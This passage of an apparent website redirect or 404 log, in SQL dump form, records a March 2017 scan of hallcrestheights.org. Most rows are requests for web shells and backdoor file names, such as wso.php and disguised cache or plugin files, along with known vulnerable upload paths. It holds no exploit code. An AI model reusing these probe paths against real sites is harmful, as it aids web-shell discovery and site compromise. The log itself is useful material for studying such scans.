00:00:00'),(7684,'http://hallcrestheights.org/cache/cachee.php?z3=MWlWckxJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:14:31','0000-00-00 00:00:00'),(7685,'http://hallcrestheights.org/thumb.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:15:04','0000-00-00 00:00:00'),(7686,'http://hallcrestheights.org/configbak.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:16:16','0000-00-00 00:00:00'),(7687,'http://hallcrestheights.org/wp-main.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:16:47','0000-00-00 00:00:00'),(7688,'http://hallcrestheights.org/robot.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:17:22','0000-00-00 00:00:00'),(7689,'http://hallcrestheights.org/install.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:17:56','0000-00-00 00:00:00'),(7690,'http://hallcrestheights.org/images/1ndex.php?z3=MWlWckxJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:18:31','0000-00-00 00:00:00'),(7691,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=MWlWckxJLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:18:52','0000-00-00 00:00:00'),(7692,'http://hallcrestheights.org/resd.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:19:17','0000-00-00 00:00:00'),(7693,'http://hallcrestheights.org/injctory.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:19:48','0000-00-00 00:00:00'),(7694,'http://hallcrestheights.org/mmytc.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:20:10','0000-00-00 00:00:00'),(7695,'http://hallcrestheights.org/M-F4r3s.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:20:37','0000-00-00 00:00:00'),(7696,'http://hallcrestheights.org/images/laj.php?z3=MWlWckxJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:21:00','0000-00-00 00:00:00'),(7697,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=MWlWckxJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:21:41','0000-00-00 00:00:00'),(7698,'http://hallcrestheights.org/wsdl.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:22:06','0000-00-00 00:00:00'),(7699,'http://hallcrestheights.org/goog1es.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:22:41','0000-00-00 00:00:00'),(7700,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=MWlWckxJLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:23:24','0000-00-00 00:00:00'),(7701,'http://hallcrestheights.org/update.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:24:03','0000-00-00 00:00:00'),(7702,'http://hallcrestheights.org/news.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:24:19','0000-00-00 00:00:00'),(7703,'http://hallcrestheights.org/SessionController.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:24:50','0000-00-00 00:00:00'),(7704,'http://hallcrestheights.org/maill.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:25:16','0000-00-00 00:00:00'),(7705,'http://hallcrestheights.org/error-log.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:26:14','0000-00-00 00:00:00'),(7706,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:26:43','0000-00-00 00:00:00'),(7707,'http://hallcrestheights.org/authenticating.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:27:23','0000-00-00 00:00:00'),(7708,'http://hallcrestheights.org/google-assist.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:27:52','0000-00-00 00:00:00'),(7709,'http://hallcrestheights.org/images/google-assist.php?z3=MWlWckxJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:28:36','0000-00-00 00:00:00'),(7710,'http://hallcrestheights.org/images/robots.txt.php?z3=MWlWckxJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:28:55','0000-00-00 00:00:00'),(7711,'http://hallcrestheights.org/elements.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:29:21','0000-00-00 00:00:00'),(7712,'http://hallcrestheights.org/xmlsrpc.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:29:54','0000-00-00 00:00:00'),(7713,'http://hallcrestheights.org/wp-cache.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:30:31','0000-00-00 00:00:00'),(7714,'http://hallcrestheights.org/images/404.php?z3=MWlWckxJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:30:50','0000-00-00 00:00:00'),(7715,'http://hallcrestheights.org/images/head.php?z3=MWlWckxJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:31:23','0000-00-00 00:00:00'),(7716,'http://hallcrestheights.org/cache/support.php?z3=MWlWckxJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:31:53','0000-00-00 00:00:00'),(7717,'http://hallcrestheights.org/RoseLeif.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:32:16','0000-00-00 00:00:00'),(7718,'http://hallcrestheights.org/Abbrevsprl.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:32:40','0000-00-00 00:00:00'),(7719,'http://hallcrestheights.org/show.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-13 03:33:47','0000-00-00 00:00:00'),(7720,'http://hallcrestheights.org/images/defau1t.php?z3=MWlWckxJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:34:03','0000-00-00 00:00:00'),(7721,'http://hallcrestheights.org/cli/40dd1d.php?z3=MWlWckxJLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:34:37','0000-00-00 00:00:00'),(7722,'http://hallcrestheights.org/bk.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:35:11','0000-00-00 00:00:00'),(7723,'http://hallcrestheights.org/infos.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:36:24','0000-00-00 00:00:00'),(7724,'http://hallcrestheights.org/cache/defau1t.php?z3=MWlWckxJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:36:58','0000-00-00 00:00:00'),(7725,'http://hallcrestheights.org/A.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:37:36','0000-00-00 00:00:00'),(7726,'http://hallcrestheights.org/bookmark.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:38:09','0000-00-00 00:00:00'),(7727,'http://hallcrestheights.org/wp-data.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:39:13','0000-00-00 00:00:00'),(7728,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:39:43','0000-00-00 00:00:00'),(7729,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:40:09','0000-00-00 00:00:00'),(7730,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:40:53','0000-00-00 00:00:00'),(7731,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:41:26','0000-00-00 00:00:00'),(7732,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:41:58','0000-00-00 00:00:00'),(7733,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-03-13 03:42:25','0000-00-00 00:00:00'),(7734,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:42:57','0000-00-00 00:00:00'),(7735,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:43:24','0000-00-00 00:00:00'),(7736,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:43:54','0000-00-00 00:00:00'),(7737,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:44:57','0000-00-00 00:00:00'),(7738,'http://hallcrestheights.org/head.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:45:21','0000-00-00 00:00:00'),(7739,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:46:20','0000-00-00 00:00:00'),(7740,'http://hallcrestheights.org/cache/list.php?z3=MWlWckxJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:46:49','0000-00-00 00:00:00'),(7741,'http://hallcrestheights.org/images/interface.php?z3=MWlWckxJLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:47:20','0000-00-00 00:00:00'),(7742,'http://hallcrestheights.org/sqldebug.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:47:51','0000-00-00 00:00:00'),(7743,'http://hallcrestheights.org/xmlrpc-activate.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:48:36','0000-00-00 00:00:00'),(7744,'http://hallcrestheights.org/keep.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:50:27','0000-00-00 00:00:00'),(7745,'http://hallcrestheights.org/tmpos.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:51:11','0000-00-00 00:00:00'),(7746,'http://hallcrestheights.org/link.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:51:54','0000-00-00 00:00:00'),(7747,'http://hallcrestheights.org/dcodzu.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:52:44','0000-00-00 00:00:00'),(7748,'http://hallcrestheights.org/codd.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:53:31','0000-00-00 00:00:00'),(7749,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=MWlWckxJLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:54:14','0000-00-00 00:00:00'),(7750,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=MWlWckxJLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:54:48','0000-00-00 00:00:00'),(7751,'http://hallcrestheights.org/content.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:55:45','0000-00-00 00:00:00'),(7752,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:56:16','0000-00-00 00:00:00'),(7753,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:56:50','0000-00-00 00:00:00'),(7754,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=MWlWckxJLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:57:36','0000-00-00 00:00:00'),(7755,'http://hallcrestheights.org/shootmei.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:58:06','0000-00-00 00:00:00'),(7756,'http://hallcrestheights.org/dcodqg.php?z3=MWlWckxJLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-13 03:58:40','0000-00-00 00:00:00'),(7757,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/1iVrLI.php',NULL,'','',1,0,'2017-03-13 03:59:15','0000-00-00 00:00:00'),(7758,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/1iVrLI.php',NULL,'','',1,0,'2017-03-13 03:59:38','0000-00-00 00:00:00'),(7759,'http://hallcrestheights.org/wp-content/uploads/1iVrLI.php',NULL,'','',1,0,'2017-03-13 04:00:06','0000-00-00 00:00:00'),(7760,'http://hallcrestheights.org/1iVrLI.php',NULL,'','',1,0,'2017-03-13 04:00:30','0000-00-00 00:00:00'),(7761,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/1iVrLI.php',NULL,'','',1,0,'2017-03-13 04:00:55','0000-00-00 00:00:00'),(7762,'http://www.hallcrestheights.org/k21212-dvis-ciwbvwk-i20162634-uxkrb-zomsmv.htm',NULL,'http://search.yahoo.co.jp/','',10,0,'2017-03-13 05:29:58','0000-00-00 00:00:00'),(7763,'http://hallcrestheights.org/cache/error_log.php',NULL,'http://hallcrestheights.org/cache/error_log.php','',2,0,'2017-03-13 07:04:11','0000-00-00 00:00:00'),(7764,'http://hallcrestheights.org/cache/logo_img.php',NULL,'http://hallcrestheights.org/cache/logo_img.php','',12,0,'2017-03-13 07:04:11','0000-00-00 00:00:00'),(7765,'http://hallcrestheights.org/cache/strange.php',NULL,'http://hallcrestheights.org/cache/strange.php','',4,0,'2017-03-13 07:04:11','0000-00-00 00:00:00'),(7766,'http://hallcrestheights.org/components/com_contact/class.wp-date.php',NULL,'http://hallcrestheights.org/components/com_contact/class.wp-date.php','',2,0,'2017-03-13 07:04:11','0000-00-00 00:00:00'),(7767,'http://hallcrestheights.org/components/com_adsmanager/db.php',NULL,'http://hallcrestheights.org/components/com_adsmanager/db.php','',2,0,'2017-03-13 07:04:11','0000-00-00 00:00:00'),(7768,'http://hallcrestheights.org/components/com_content/contents.php',NULL,'http://hallcrestheights.org/components/com_content/contents.php','',4,0,'2017-03-13 07:04:11','0000-00-00 00:00:00'),(7769,'http://hallcrestheights.org/components/com_content/models.php',NULL,'http://hallcrestheights.org/components/com_content/models.php','',2,0,'2017-03-13 07:04:11','0000-00-00 00:00:00'),(7770,'http://hallcrestheights.org/components/com_adsmanager/db_1.php',NULL,'http://hallcrestheights.org/components/com_adsmanager/db_1.php','',2,0,'2017-03-13 07:04:11','0000-00-00 00:00:00'),(7771,'http://hallcrestheights.org/components/com_options/models/item.php',NULL,'http://hallcrestheights.org/components/com_options/models/item.php','',5,0,'2017-03-13 07:04:29','0000-00-00 00:00:00'),(7772,'http://hallcrestheights.org/components/com_search/views/views.php',NULL,'http://hallcrestheights.org/components/com_search/views/views.php','',2,0,'2017-03-13 07:04:29','0000-00-00 00:00:00'),(7773,'http://hallcrestheights.org/components/com_jce/com_jce.php',NULL,'http://hallcrestheights.org/components/com_jce/com_jce.php','',2,0,'2017-03-13 07:04:29','0000-00-00 00:00:00'),(7774,'http://hallcrestheights.org/components/com_search/com_search.php',NULL,'http://hallcrestheights.org/components/com_search/com_search.php','',1,0,'2017-03-13 07:04:29','0000-00-00 00:00:00'),(7775,'http://hallcrestheights.org/components/com_rokcandy/com_rokcandy.php',NULL,'http://hallcrestheights.org/components/com_rokcandy/com_rokcandy.php','',2,0,'2017-03-13 07:04:29','0000-00-00 00:00:00'),(7776,'http://hallcrestheights.org/components/com_mailto/com_mailto.php',NULL,'http://hallcrestheights.org/components/com_mailto/com_mailto.php','',2,0,'2017-03-13 07:04:29','0000-00-00 00:00:00'),(7777,'http://hallcrestheights.org/components/com_finder/com_finder.php',NULL,'http://hallcrestheights.org/components/com_finder/com_finder.php','',2,0,'2017-03-13 07:04:29','0000-00-00 00:00:00'),(7778,'http://hallcrestheights.org/components/com_userprofiles/userprofiles.php',NULL,'http://hallcrestheights.org/components/com_userprofiles/userprofiles.php','',2,0,'2017-03-13 07:04:29','0000-00-00 00:00:00'),(7779,'http://hallcrestheights.org/components/com_user/login.php',NULL,'http://hallcrestheights.org/components/com_user/login.php','',2,0,'2017-03-13 07:04:29','0000-00-00 00:00:00'),(7780,'http://hallcrestheights.org/components/com_sys_rom/sys_rom.php',NULL,'http://hallcrestheights.org/components/com_sys_rom/sys_rom.php','',2,0,'2017-03-13 07:04:30','0000-00-00 00:00:00'),(7781,'http://hallcrestheights.org/components/com_content/models/forms/xml-link.php',NULL,'http://hallcrestheights.org/components/com_content/models/forms/xml-link.php','',2,0,'2017-03-13 07:04:30','0000-00-00 00:00:00'),(7782,'http://hallcrestheights.org/components/com_search/models/models.php',NULL,'http://hallcrestheights.org/components/com_search/models/models.php','',3,0,'2017-03-13 07:04:30','0000-00-00 00:00:00'),(7783,'http://hallcrestheights.org/components/com_tags/com_tags.php',NULL,'http://hallcrestheights.org/components/com_tags/com_tags.php','',2,0,'2017-03-13 07:04:31','0000-00-00 00:00:00'),(7784,'http://hallcrestheights.org/components/com_virtuemart_allinone/com_virtuemart_allinone.php',NULL,'http://hallcrestheights.org/components/com_virtuemart_allinone/com_virtuemart_allinone.php','',2,0,'2017-03-13 07:04:46','0000-00-00 00:00:00'),(7785,'http://hallcrestheights.org/components/error_log.php',NULL,'http://hallcrestheights.org/components/error_log.php','',2,0,'2017-03-13 07:04:46','0000-00-00 00:00:00'),(7786,'http://hallcrestheights.org/components/com_weblinks/views/categories/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_weblinks/views/categories/tmpl/config.php','',3,0,'2017-03-13 07:04:46','0000-00-00 00:00:00'),(7787,'http://hallcrestheights.org/components/com_users/views/reset/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_users/views/reset/tmpl/config.php','',2,0,'2017-03-13 07:04:46','0000-00-00 00:00:00'),(7788,'http://hallcrestheights.org/components/components.php',NULL,'http://hallcrestheights.org/components/components.php','',4,0,'2017-03-13 07:04:46','0000-00-00 00:00:00'),(7789,'http://hallcrestheights.org/components/com_users/auth.class.php',NULL,'http://hallcrestheights.org/components/com_users/auth.class.php','',8,0,'2017-03-13 07:04:46','0000-00-00 00:00:00'),(7790,'http://hallcrestheights.org/help/logo_img.php',NULL,'http://hallcrestheights.org/help/logo_img.php','',2,0,'2017-03-13 07:04:46','0000-00-00 00:00:00'),(7791,'http://hallcrestheights.org/contact.php',NULL,'http://hallcrestheights.org/contact.php','',2,0,'2017-03-13 07:04:46','0000-00-00 00:00:00'),(7792,'http://hallcrestheights.org/framework.php',NULL,'http://hallcrestheights.org/framework.php','',6,0,'2017-03-13 07:04:47','0000-00-00 00:00:00'),(7793,'http://hallcrestheights.org/components/logo_img.php',NULL,'http://hallcrestheights.org/components/logo_img.php','',7,0,'2017-03-13 07:04:47','0000-00-00 00:00:00'),(7794,'http://hallcrestheights.org/components/com_weblinks/com_weblinks.php',NULL,'http://hallcrestheights.org/components/com_weblinks/com_weblinks.php','',2,0,'2017-03-13 07:04:47','0000-00-00 00:00:00'),(7795,'http://hallcrestheights.org/components/com_widgetkit/com_widgetkit.php',NULL,'http://hallcrestheights.org/components/com_widgetkit/com_widgetkit.php','',2,0,'2017-03-13 07:04:47','0000-00-00 00:00:00'),(7796,'http://hallcrestheights.org/components/com_wrapper/new.php',NULL,'http://hallcrestheights.org/components/com_wrapper/new.php','',2,0,'2017-03-13 07:04:47','0000-00-00 00:00:00'),(7797,'http://hallcrestheights.org/images/maink.php',NULL,'http://hallcrestheights.org/images/maink.php','',3,0,'2017-03-13 07:05:22','0000-00-00 00:00:00'),(7798,'http://hallcrestheights.org/images/ini.php',NULL,'http://hallcrestheights.org/images/ini.php','',5,0,'2017-03-13 07:05:23','0000-00-00 00:00:00'),(7799,'http://hallcrestheights.org/images/amazing.php',NULL,'http://hallcrestheights.org/images/amazing.php','',5,0,'2017-03-13 07:05:23','0000-00-00 00:00:00'),(7800,'http://hallcrestheights.org/images/ccs.php',NULL,'http://hallcrestheights.org/images/ccs.php','',2,0,'2017-03-13 07:05:23','0000-00-00 00:00:00'),(7801,'http://hallcrestheights.org/images/images.php',NULL,'http://hallcrestheights.org/images/images.php','',3,0,'2017-03-13 07:05:23','0000-00-00 00:00:00'),(7802,'http://hallcrestheights.org/images/cache.php',NULL,'http://hallcrestheights.org/images/cache.php','',7,0,'2017-03-13 07:05:23','0000-00-00 00:00:00'),(7803,'http://hallcrestheights.org/images/inc.php',NULL,'http://hallcrestheights.org/images/inc.php','',2,0,'2017-03-13 07:05:23','0000-00-00 00:00:00'),(7804,'http://hallcrestheights.org/images/configurs01.simplez.php',NULL,'http://hallcrestheights.org/images/configurs01.simplez.php','',2,0,'2017-03-13 07:05:23','0000-00-00 00:00:00'),(7805,'http://hallcrestheights.org/images/1.php',NULL,'http://hallcrestheights.org/images/1.php','',3,0,'2017-03-13 07:05:23','0000-00-00 00:00:00'),(7806,'http://hallcrestheights.org/images/cachefix.php',NULL,'http://hallcrestheights.org/images/cachefix.php','',3,0,'2017-03-13 07:05:24','0000-00-00 00:00:00'),(7807,'http://hallcrestheights.org/images/joomla.php',NULL,'http://hallcrestheights.org/images/joomla.php','',2,0,'2017-03-13 07:05:24','0000-00-00 00:00:00'),(7808,'http://hallcrestheights.org/images/indax.php',NULL,'http://hallcrestheights.org/images/indax.php','',2,0,'2017-03-13 07:05:24','0000-00-00 00:00:00'),(7809,'http://hallcrestheights.org/includes/mconfig.php',NULL,'http://hallcrestheights.org/includes/mconfig.php','',2,0,'2017-03-13 07:05:55','0000-00-00 00:00:00'),(7810,'http://hallcrestheights.org/images/shwso.php',NULL,'http://hallcrestheights.org/images/shwso.php','',3,0,'2017-03-13 07:05:55','0000-00-00 00:00:00'),(7811,'http://hallcrestheights.org/images/simple.php',NULL,'http://hallcrestheights.org/images/simple.php','',4,0,'2017-03-13 07:05:55','0000-00-00 00:00:00'),(7812,'http://hallcrestheights.org/images/wso.php',NULL,'http://hallcrestheights.org/images/wso.php','',5,0,'2017-03-13 07:05:55','0000-00-00 00:00:00'),(7813,'http://hallcrestheights.org/images/sampledata/fruitshop/smile.php',NULL,'http://hallcrestheights.org/images/sampledata/fruitshop/smile.php','',4,0,'2017-03-13 07:05:55','0000-00-00 00:00:00'),(7814,'http://hallcrestheights.org/includes/pathixay.php',NULL,'http://hallcrestheights.org/includes/pathixay.php','',2,0,'2017-03-13 07:05:55','0000-00-00 00:00:00'),(7815,'http://hallcrestheights.org/images/syslib.php',NULL,'http://hallcrestheights.org/images/syslib.php','',2,0,'2017-03-13 07:05:55','0000-00-00 00:00:00'),(7816,'http://hallcrestheights.org/images/temp.php',NULL,'http://hallcrestheights.org/images/temp.php','',7,0,'2017-03-13 07:05:55','0000-00-00 00:00:00'),(7817,'http://hallcrestheights.org/includes/class.php',NULL,'http://hallcrestheights.org/includes/class.php','',2,0,'2017-03-13 07:05:55','0000-00-00 00:00:00'),(7818,'http://hallcrestheights.org/images/sbin.php',NULL,'http://hallcrestheights.org/images/sbin.php','',5,0,'2017-03-13 07:05:56','0000-00-00 00:00:00'),(7819,'http://hallcrestheights.org/images/media.php',NULL,'http://hallcrestheights.org/images/media.php','',5,0,'2017-03-13 07:05:56','0000-00-00 00:00:00'),(7820,'http://hallcrestheights.org/images/mod_config.php',NULL,'http://hallcrestheights.org/images/mod_config.php','',5,0,'2017-03-13 07:05:56','0000-00-00 00:00:00'),(7821,'http://hallcrestheights.org/includes/help.php',NULL,'http://hallcrestheights.org/includes/help.php','',2,0,'2017-03-13 07:05:56','0000-00-00 00:00:00'),(7822,'http://hallcrestheights.org/includes/rsq.php',NULL,'http://hallcrestheights.org/includes/rsq.php','',7,0,'2017-03-13 07:05:56','0000-00-00 00:00:00'),(7823,'http://hallcrestheights.org/includes/tmp.php',NULL,'http://hallcrestheights.org/includes/tmp.php','',3,0,'2017-03-13 07:05:57','0000-00-00 00:00:00'),(7824,'http://hallcrestheights.org/libraries/joomla/cache/controller/cache/cache/langs.php',NULL,'http://hallcrestheights.org/libraries/joomla/cache/controller/cache/cache/langs.php','',6,0,'2017-03-13 07:06:17','0000-00-00 00:00:00'),(7825,'http://hallcrestheights.org/language/logo_img.php',NULL,'http://hallcrestheights.org/language/logo_img.php','',11,0,'2017-03-13 07:06:17','0000-00-00 00:00:00'),(7826,'http://hallcrestheights.org/libraries/logo_img.php',NULL,'http://hallcrestheights.org/libraries/logo_img.php','',9,0,'2017-03-13 07:06:17','0000-00-00 00:00:00'),(7827,'http://hallcrestheights.org/libraries/joomla/news.php',NULL,'http://hallcrestheights.org/libraries/joomla/news.php','',2,0,'2017-03-13 07:06:17','0000-00-00 00:00:00'),(7828,'http://hallcrestheights.org/libraries/joomla/user/newfile.php',NULL,'http://hallcrestheights.org/libraries/joomla/user/newfile.php','',2,0,'2017-03-13 07:06:17','0000-00-00 00:00:00'),(7829,'http://hallcrestheights.org/libraries/openid/auth/openidopenid.php',NULL,'http://hallcrestheights.org/libraries/openid/auth/openidopenid.php','',2,0,'2017-03-13 07:06:17','0000-00-00 00:00:00'),(7830,'http://hallcrestheights.org/libraries/joomla/date/time.php',NULL,'http://hallcrestheights.org/libraries/joomla/date/time.php','',4,0,'2017-03-13 07:06:17','0000-00-00 00:00:00'),(7831,'http://hallcrestheights.org/libraries/simplepie/idn/syslib.php',NULL,'http://hallcrestheights.org/libraries/simplepie/idn/syslib.php','',2,0,'2017-03-13 07:06:17','0000-00-00 00:00:00'),(7832,'http://hallcrestheights.org/libraries/idna_convert/loc.php',NULL,'http://hallcrestheights.org/libraries/idna_convert/loc.php','',2,0,'2017-03-13 07:06:18','0000-00-00 00:00:00'),(7833,'http://hallcrestheights.org/libraries/joomla/html/parameter/element/checkbox.php',NULL,'http://hallcrestheights.org/libraries/joomla/html/parameter/element/checkbox.php','',2,0,'2017-03-13 07:06:18','0000-00-00 00:00:00'),(7834,'http://hallcrestheights.org/libraries/joomla/access/strange.php',NULL,'http://hallcrestheights.org/libraries/joomla/access/strange.php','',2,0,'2017-03-13 07:06:18','0000-00-00 00:00:00'),(7835,'http://hallcrestheights.org/libraries/joomla/session/storage/joomlasess.php',NULL,'http://hallcrestheights.org/libraries/joomla/session/storage/joomlasess.php','',2,0,'2017-03-13 07:06:18','0000-00-00 